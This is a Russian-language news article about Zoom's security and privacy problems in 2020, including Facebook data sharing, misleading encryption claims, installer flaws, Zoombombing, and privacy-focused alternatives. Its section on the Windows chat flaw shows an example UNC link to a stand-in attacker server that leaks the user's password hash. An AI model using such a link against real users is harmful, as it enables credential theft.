Утечки данных, отсутствие шифрования, передача данных Facebook: за что критикуют видеоконференции Zoom и есть ли замена

В условиях пандемии Zoom стал необходимым инструментом для удалённой работы — но в нём находят всё больше уязвимостей, которые компания спешит исправлять.

Массовый переход на удалённую работу из-за пандемии Covid-19 превратил сервис видеоконференций Zoom в один из основных рабочих инструментов. Но это же заставило приглядеться к его безопасности.

Специалисты критикуют Zoom за слабую конфиденциальность и продолжают находить уязвимости: подключение к чужим разговорам, передача данных с iOS-приложения в Facebook, отсутствие сквозного шифрования, возможность украсть пароль учётной записи Windows и получить полный доступ к macOS.

Коротко о том, как отвечает компания и есть ли альтернативы Zoom.

26 марта издание Motherboard рассказало, что приложение Zoom для iOS отправляет аналитические данные в Facebook, даже если у пользователя нет учётной записи в соцсети.

После запуска приложение подключается к Facebook SDK — основному инструменту, с помощью которого разработчики передают и получают данные в Facebook.

Оно отправляло в соцсеть информацию о времени запуска, модели устройства, часовом поясе, городе, данные о мобильном операторе и уникальный рекламный идентификатор, который создаёт iPhone или iPad. Идентификатор позволяет точнее таргетировать рекламу.

При этом в политике конфиденциальности Zoom указано, что компания может собирать из Facebook информацию абонента, если он использовал соцсеть для входа или создания учётной записи. Но сервис не предупредил, что приложение и без того передаёт данные в соцсеть.

28 марта 2020 года Zoom выпустил обновление, в котором удалил код отправки аналитической информации в Facebook. Представители сервиса заявили, что с помощью Facebook SDK сделали возможным вход в Zoom через аккаунт в соцсети, но лишь недавно выяснили, что фреймворк собирает ненужные данные.

Тем не менее пользователи подали групповой иск против Zoom, обвинив компанию в нарушении калифорнийского закона о защите персональных данных. По их мнению, Zoom не спросил согласия на передачу данных, а также ничего не сделал, чтобы заблокировать работу предыдущих версий приложения.

31 марта издание The Intercept рассказало, что видеозвонки в Zoom не защищены сквозным шифрованием (end-to-end, E2E), когда доступ к беседе имеют только участники. Хотя компания заявляет, что шифрует диалоги, на сайте, в технических документах и интерфейсе приложений.

Встреча в Zoom будет полностью зашифрованной, если контент смогут расшифровать только участники с помощью ключа, который генерируется на их устройствах. Сервис при этом может иметь доступ к зашифрованному контенту, но ключа у него не будет, а значит, и технической возможности разобраться в диалоге.

Zoom заявляет, что организаторы видеоконференции могут вручную включить E2E-шифрование. Тогда участники увидят надпись «Zoom использует E2E-зашифрованное соединение».

В разговоре с The Intercept представитель Zoom заметил, что сейчас видеовстречи используют не E2E, а комбинацию TCP- и UDP-соединений, чтобы обеспечить масштабирование, а для защиты используется технология TLS — транспортное шифрование, которое используют для защиты HTTPS-сайтов.

Он же рассказал, что под end-to-end компания подразумевает шифрование между «конечными точками» — серверами Zoom. Соединение между приложением и сервером зашифровано так же, как соединение между браузером и сайтом, и технически Zoom может получить доступ к незашифрованному видео- и аудиоконтенту, считает The Intercept.

В групповых видеоконференциях сложно реализовать сквозное шифрование, отмечает Мэтью Грин, профессор компьютерных наук Университета Джона Хопкинса.

Это связано с оптимизацией потокового видео: сервису нужно понимать, кто говорит, чтобы передавать его видеопоток с более высоким разрешением и снижать качество для других участников.

Это сделать намного проще, если Zoom будет «видеть» весь контент, объясняет Грин. Но примеры реализации E2E в видеочатах есть — это FaceTime. Zoom защищает сквозным шифрованием только текстовые чаты: компания заявила, что у сотрудников нет ключей для расшифровки сообщений.

Также The Intercept выяснило, что Zoom собирает только пользовательские данные, необходимые для улучшения качества сервиса: IP-адреса, информацию об операционной системе и устройстве, запрещает сотрудникам получать доступ к содержимому бесед и не продаёт эти сведения сторонним организациям.

Но компания вынуждена передавать записи собраний правительствам или правоохранительным органам в ответ на юридические запросы, отмечает The Intercept. В отличие от Microsoft, Google и Facebook, публикующих отчёты о прозрачности со списком стран, откуда они получали запросы, Zoom такую информацию не раскрывает.

Более того, заявление Zoom о сквозном шифровании можно расценить как недобросовестную рекламу, ведь оно не соответствует действительности, но помогает увеличивать долю на рынке, отмечает издание.

18 марта 2020 года правозащитная группа Access Now опубликовала открытое письмо, призывающее Zoom опубликовать отчёт о прозрачности, чтобы помочь пользователям понять, что компания делает для защиты своих данных.

Пока она не отреагировала на письмо, но подчеркнула, что по закону обязана работать с правоохранительными органами. Были ли запросы и сколько, представители Zoom не раскрыли.

28 января 2020 года специалисты компании Check Point Research рассказали о найденной в 2019-м уязвимости, позволявшей подключаться к чужим конференциям без приглашения, а также собирать информацию и копировать файлы, которыми обменивались участники.

По данным исследования, Zoom присваивала конференциям случайные числовые идентификаторы длиной от 9 до 11 символов, чтобы участники подключались к разговору. Специалисты Check Point Research разработали метод, с помощью которого в 4% случаев можно было попасть в видеоконференцию. Они передали информацию в Zoom.

Компания решила проблему: заменила случайную генерацию «криптографически надёжной», добавила дополнительные символы и ввела обязательную идентификацию по паролю.

31 марта издание Motherboard рассказало, что Zoom автоматически объединил в один список электронные адреса нескольких тысяч пользователей из Нидерландов — с возможностью увидеть почту, фото и начать видеозвонок.

Проблема возникла с функцией «Каталог компаний». Она автоматически добавляет других людей в список контактов пользователя, если они зарегистрировались с адресом электронной почты с тем же доменом. «Каталог» упрощает поиск коллег, если домен принадлежит одной компании, например @vc.ru или @microsoft.com.

Проблема коснулась нидерландских провайдеров xs4all.nl, dds.nl и quicknet.nl, которые предлагают услуги электронной почты. Они посоветовали обратиться к Zoom, так как не могли повлиять на ситуацию.

Представители сервиса рассказали, что после обращения Motherboard обновили чёрные списки доменов и исправили проблему.

25 марта авторы HuffPost заметили функцию «Отслеживание внимания». Она позволяет администратору встречи видеть, активно ли окно Zoom у участников или же они переключились на другое приложение дольше чем на 30 секунд.

По мнению журналистов, эта функция потревожит тех, кто привык заниматься рабочими задачами, пока в фоне идёт разговор с коллегами по видеосвязи.

Пользователи могут отключить функцию в настройках учётной записи, но администратор может сделать её обязательной для всех пользователей во время создания встречи.

20 марта журналисты TechCrunch обратили внимание на «тёмный паттерн». Компания очень неявно предлагает присоединиться к встрече через браузер и таким образом вынуждает скачивать приложение.

Издание замечает, что Zoom предлагает перейти в веб-версию встречи только после того, как пользователь нажал кнопку «Присоединиться». Предложение скачать и запустить приложение Zoom выделено крупным шрифтом, тогда как кнопка перехода в браузер практически незаметна.

Zoom не стоит скрывать функцию подключения через браузер, считает TechCrunch. Многие сотрудники используют корпоративные компьютеры, на которых запрещена установка приложений, чтобы улучшить безопасность.

Более того, корректнее было бы рассказывать о дополнительных функциях приложения и этим заинтересовать пользователей, чем заставлять думать, что у них нет другого выбора, кроме установки.

Чтобы это исправить, издание предлагает администраторам встречи включать в настройках отображение прямой ссылки на веб-версию встречи.

Технический руководитель VMRay Феликс Зееле обнаружил, что macOS-версия Zoom скрытно устанавливается в систему без согласия пользователя, используя те же механики, что и вредоносные программы.

Zoom использует скрипты, чтобы вручную распаковать приложение через встроенный 7Zip и установить его, если пользователь системы — администратор.

Если приложение уже установлено, но пользователь не является администратором, Zoom использует дополнительные инструменты, чтобы вызвать запрос на ввод пароля для получения прав администратора, не спрашивая разрешения пользователя.

Популярность Zoom привлекла интернет-троллей, которые вмешиваются в публичные конференции. Они подключаются к беседе и используют функцию демонстрации экрана, чтобы материться, показывать порно, свастику, вынуждая прервать конференцию. Атака стала называться Zoombombing.

Причина — для большинства собраний Zoom есть общедоступная ссылка, которая позволяет любому присоединиться к диалогу. Злоумышленники собирают такие ссылки и делятся ими в приватных группах, а затем устраивают набег, пишет The Verge. Часто нападают на школьные и студенческие собрания.

30 марта ФБР предупредила пользователей о проблеме и призвала запрашивать пароль для доступа к видеозвонку и не размещать ссылки на конференции в соцсетях.

Чтобы предотвратить атаку, нужно отключить в настройках собрания общий доступ к экрану.

• Для приложения: открыть меню левее кнопки «Демонстрация экрана» во время конференции и выставить опцию «Только организатор» в пункте «Кто может осуществлять демонстрацию».

• Для мобильной версии: нажать кнопку «Подробнее» (...) в правом нижнем углу, выбрать «Настройки конференции» и там отключить функцию «Разрешить участникам выполнять трансляцию».

31 марта исследователь по кибербезопасности Мэтью Хикки обнаружил уязвимость приложения Zoom для Windows, которая позволяет украсть данные учетной записи пользователя Windows через URL-ссылку.

При отправке сообщения в чате Zoom преобразует ссылку на сайт в гиперссылку, чтобы участникам встречи было проще перейти по ней в браузер. Но приложение сервиса также преобразует в ссылку и сетевые UNC-пути к файлам формата \\evil.server.com\images\cat.jpg.

Если пользователь кликнет по такой ссылке, Windows попытается подключиться к сайту через протокол совместного использования файлов SMB, чтобы открыть jpg-файл, и по умолчанию отправляет имя пользователя и его хеш-пароль. Его легко взломать с помощью бесплатных инструментов, таких как Hashcat, отмечает издание Bleeping Computer.

Путь к файлу можно использовать и для запуска программ на компьютере пользователя, но Windows предупредит об этом.

Чтобы решить проблему, Zoom должен отключить автоматическую конвертацию UNC-путей в чате, заявил Хикки. Он рассказал об уязвимости Zoom, но компания пока никак не отреагировала.

1 апреля бывший хакер АНБ Патрик Уордл рассказал ещё о двух уязвимостях приложения Zoom для macOS, которые используют «теневую» установку Zoom, на которую указывал Феликс Зееле.

По словам Уордла, злоумышленник может внедрить в программу установки Zoom вредоносный код для получения прав «суперпользователя» и полного доступа к системе.

Также через редактирование инсталлятора Zoom можно автоматически получить доступ к веб-камере и микрофону, скопировав у Zoom уровни доступа к системе в обход запроса macOS, и записывать видео собраний.

Но Уордл отмечает, что для совершения этих действий злоумышленник сначала должен получить локальный доступ к компьютеру пользователя.

Zoom пока не прокомментировала ситуацию и не предложила варианты исправления уязвимостей.

24 марта аналитики ConsumerReports рассказали, что Zoom собирала личную информацию о пользователях, но при этом не объясняла что и для чего. Политика конфиденциальности Zoom гласила: компания имеет право собирать и хранить личные данные клиентов и передавать их третьим лицам, например рекламодателям.

Zoom заявляла, что политика распространяется на «контент клиента», который он передаёт во время использования. К нему могут относиться чаты, документы, отображаемые на экране, имена всех участников, стенограммы конференций и даже видео.

30 марта Zoom изменила документ. Компания объявила, что «контент клиента» больше нельзя использовать в рекламных целях, видео сохраняется только по запросу пользователя и не доступно для компании. Также в новой политике раскрыли, какую информацию собирает Zoom: к примеру, номера телефонов и имена пользователей.

Если организатор встречи не записывает собрание, аудио, чат и видео не сохраняются. Если организатор начинает запись трансляции, её участникам придёт уведомление — они могут отказаться и покинуть встречу.

В новой политике конфиденциальности также прояснили функцию отслеживания внимания, которая вызывала критику, — за оповещение о её активации отвечают организаторы собрания.

Основные «конкуренты» Zoom — сервисы Slack и Microsoft Teams, который заменил Skype для бизнеса, а также Google Hangouts.

TechCrunch предлагает несколько вариантов, ориентированных на конфиденциальность. FaceTime и WhatsApp, по словам журналистов, полностью зашифрованы, но первый сервис работает только на устройствах Apple, а второй ограничен четырьмя участниками.

Ещё один вариант — платформа Jitsi. У неё нет сквозного шифрования, но исходный код открыт, так что компании могут убедиться в отсутствии бэкдоров, пишет TechCrunch. Jitsi можно запустить на локальном сервере, чтобы улучшить конфиденциальность, но это можно сделать и в Zoom с помощью Meeting Connector.

Среди других безопасных сервисов Vice отмечает Wire, но сквозное шифрование в нём работает только в платной версии.